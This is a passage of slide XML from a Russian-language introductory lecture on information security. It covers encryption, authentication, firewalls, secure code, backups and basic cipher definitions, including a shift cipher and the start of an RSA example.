            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1500120"/>
            <a:ext cx="8227440" cy="5069880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="9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c00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Конфиденциальность:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>шифрование, виртуальные частные сети (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="9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c00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Аутентификация:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>спецпротоколы аутентификации и обмена ключами шифрования, сертификаты</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="9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c00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Целостность данных:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ЭЦП</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="9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c00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Защита локальных сетей:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Межсетевые экраны (брандмауэры, файерволы), </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>NAT</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, прокси-серверы</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>системы обнаружения вторжений, мониторинга сети</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="Text Box 3"/>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5B04ACF5-733C-45FF-A1AE-E23AF782E68B}"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2" name="Text Box 1"/>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42377A5E-BA16-4DC4-86EA-EB1B3EAD1CE3}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Text Box 2"/>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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Самое главное:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3900"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>безопасный код</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="Text Box 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8684640" cy="4541400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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Правильная программа</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="669999"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>удовлетворяет спецификациям</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>По разумным входным данным выдает правильный результат</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Безопасная программа</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="669999"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>сохраняет работоспособность перед лицом атаки</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>при </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2600" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>не</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>разумном вводе, вывод хотя бы не приводит к гибели всю систему</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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5"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Без этого нельзя</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8227440" cy="4409640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-338040" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="341280"/>
                <a:tab algn="l" pos="789120"/>
                <a:tab algn="l" pos="1238400"/>
                <a:tab algn="l" pos="1687680"/>
                <a:tab algn="l" pos="2136600"/>
                <a:tab algn="l" pos="2585880"/>
                <a:tab algn="l" pos="3035160"/>
                <a:tab algn="l" pos="3484440"/>
                <a:tab algn="l" pos="3933720"/>
                <a:tab algn="l" pos="4383000"/>
                <a:tab algn="l" pos="4832280"/>
                <a:tab algn="l" pos="5281560"/>
                <a:tab algn="l" pos="5730840"/>
                <a:tab algn="l" pos="6180120"/>
                <a:tab algn="l" pos="6629400"/>
                <a:tab algn="l" pos="7078680"/>
                <a:tab algn="l" pos="7527960"/>
                <a:tab algn="l" pos="7977240"/>
                <a:tab algn="l" pos="8426520"/>
                <a:tab algn="l" pos="8875800"/>
                <a:tab algn="l" pos="9325080"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Системы </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>резервного </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>копирования</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="Text Box 3"/>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913C1C0B-39AF-4748-93D8-C139E461CEA2}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="448" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4005360" y="1857240"/>
            <a:ext cx="4446000" cy="3569760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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9" name="Text Box 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7434360" y="714240"/>
            <a:ext cx="912240" cy="4522320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="45000" rIns="45000" tIns="90000" bIns="90000" anchor="ctr" vert="eaVe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4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Криптография</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Text Box 2"/>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A3C5307C-92B7-46BE-97EA-F4E67056E447}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="451" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1785960" y="928800"/>
            <a:ext cx="5485680" cy="5147640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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2"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Что такое шифр?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8227440" cy="1564560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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u="sng">
                <a:solidFill>
                  <a:srgbClr val="3a68dc"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Шифр</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> – отображение множества открытых данных на множество возможных зашифрованных данных</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Text Box 3"/>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919CAA8B-6CD7-4060-B443-5560306E0D80}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="455" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5524560" y="3643200"/>
            <a:ext cx="3331440" cy="2407680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="Text Box 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428760" y="3571920"/>
            <a:ext cx="4998600" cy="2379240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:sp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ru-RU" sz="3000" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="3a68dc"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ключ</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> — параметр шифра, фиксирующий одно биективное отображение из множества всех возможных</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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7"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Пример</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8227440" cy="4409640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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Пример 1:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Шифр: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>F(x)=x+k</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ключ: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="850aff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Пример 2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (RSA)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Шифр: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
